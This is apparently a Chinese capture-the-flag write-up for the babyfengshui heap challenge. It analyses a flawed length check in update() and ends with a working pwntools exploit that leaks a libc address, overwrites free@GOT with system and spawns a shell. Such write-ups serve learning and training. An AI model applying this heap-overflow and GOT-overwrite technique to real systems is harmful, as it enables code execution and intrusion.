BUUCTF pwn babyfengshui_33c3_2016(简单堆)
0x01 文件分析
0x02 运行
程序提供了几个简单的功能,增删改查都有。运行的时候程序有定时机制,可以用IDA的patch功能修改二进制指令,消除定时。
0x03 静态分析
主函数:
void __cdecl __noreturn main()
{
char v0; // [esp+3h] [ebp-15h]
int v1; // [esp+4h] [ebp-14h]
size_t v2; // [esp+8h] [ebp-10h]
unsigned int v3; // [esp+Ch] [ebp-Ch]
v3 = __readgsdword(0x14u);
setvbuf(stdin, 0, 2, 0);
setvbuf(stdout, 0, 2, 0);
while ( 1 )
{
puts("0: Add a user");
puts("1: Delete a user");
puts("2: Display a user");
puts("3: Update a user description");
puts("4: Exit");
printf("Action: ");
if ( __isoc99_scanf("%d", &v1) == -1 )
break;
if ( !v1 )
{
printf("size of description: ");
__isoc99_scanf("%u%c", &v2, &v0);
Add(v2);
}
if ( v1 == 1 )
{
printf("index: ");
__isoc99_scanf("%d", &v2);
delete(v2);
}
if ( v1 == 2 )
{
printf("index: ");
__isoc99_scanf("%d", &v2);
display(v2);
}
if ( v1 == 3 )
{
printf("index: ");
__isoc99_scanf("%d", &v2);
update(v2);
}
if ( v1 == 4 )
{
puts("Bye");
exit(0);
}
if ( (unsigned __int8)count > 49u )
{
puts("maximum capacity exceeded, bye");
exit(0);
}
}
exit(1);
}
Add:
Add函数进行了两次堆的申请,并且把第一次申请的堆的地址赋值到第二次申请的堆的数据之中,由此可以判断出此函数利用了一个结构体,而第二次申请的堆的大小是固定的,可以得到结构体的数据结构:
struct Node{
char * description;
char name[0x7C];
}
s便是description的空间地址,而v2则是结构体的空间。
delete:
检查空间是否存在,free掉前面申请的空间并赋值为0。
display:
显示数据
update:
更新description里面的数据,需要注意的是其检查数据长度的方式(13行),是以description堆块的起始地址和name的起始地址之间的长度。
0x04 思路
由于update函数中的判断数据长度是否合法的方式有问题,可以通过申请连续小堆块,再释放申请大堆块的方式绕过。
具体方式如下:
1.首先申请连续的3个结构体,description部分空间大小为0x80,方便计算:
| 堆块 0des 0x80 | 堆块0 node 0x80 | 堆块1 des 0x80 | 堆块1 node 0x80 | 堆块2 des 0x8 | 堆块2 node 0x80 |
|---|
2.释放第一个结构体,得到一个空闲的0x100的堆块:
| 空闲堆块 0x100 | 堆块1 des 0x80 | 堆块1 node 0x80 | 堆块2 des 0x8 | 堆块2 node 0x80 |
|---|
3.申请新的结构体,其description部分为0x100,根据linux堆的性质,会优先分配空闲的堆块,释放得到的空闲堆块可以满足description的空间需求,而node的空间需要新分配,得到下面的结构:
| 堆块 0 des 0x100 | 堆块1 des 0x80 | 堆块1 node 0x80 | 堆块2 des 0x8 | 堆块2 node 0x80 | 堆块0 node 0x80 |
|---|
根据判断数据合法长度的方式,堆块0的des和name相差地址为之间堆块的长度的和,绕过了长度判断,可以利用堆溢出来修改中间堆块的块首,得到libc,然后得到shell。
新版的libc其堆的机制有所改变(libc2.26及以上的,增加了tcache机制),不能以此利用
0x05 exp
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
#p = process('./babyfengshui')
p = remote('node3.buuoj.cn', 28668)
elf = ELF('babyfengshui')
def Add(size, length, text):
p.sendlineafter("Action: ", '0')
p.sendlineafter("description: ", str(size))
p.sendlineafter("name: ", 'qin')
p.sendlineafter("length: ", str(length))
p.sendlineafter("text: ", text)
def Del(index):
p.sendlineafter("Action: ", '1')
p.sendlineafter("index: ", str(index))
def Dis(index):
p.sendlineafter("Action: ", '2')
p.sendlineafter("index: ", str(index))
def Upd(index, length, text):
p.sendlineafter("Action: ", '3')
p.sendlineafter("index: ", str(index))
p.sendlineafter("length: ", str(length))
p.sendlineafter("text: ", text)
Add(0x80, 0x80, 'qin')
Add(0x80, 0x80, 'qin')
Add(0x8, 0x8, '/bin/sh\x00')
Del(0)
#注意堆块块首的长度
Add(0x100, 0x19c, "a"*0x198+p32(elf.got['free']))
Dis(1)
p.recvuntil("description: ")
free_addr = u32(p.recv(4))
libc = LibcSearcher('free', free_addr)
libc_base = free_addr - libc.dump('free')
sys_addr = libc_base + libc.dump('system')
#堆块1的description指针已经被修改为free的地址,则可以将free地址内的内容替换为system
Upd(1, 0x4, p32(sys_addr))
Del(2)
p.interactive()
一个简单的网络安全公众号,欢迎各位朋友们关注!
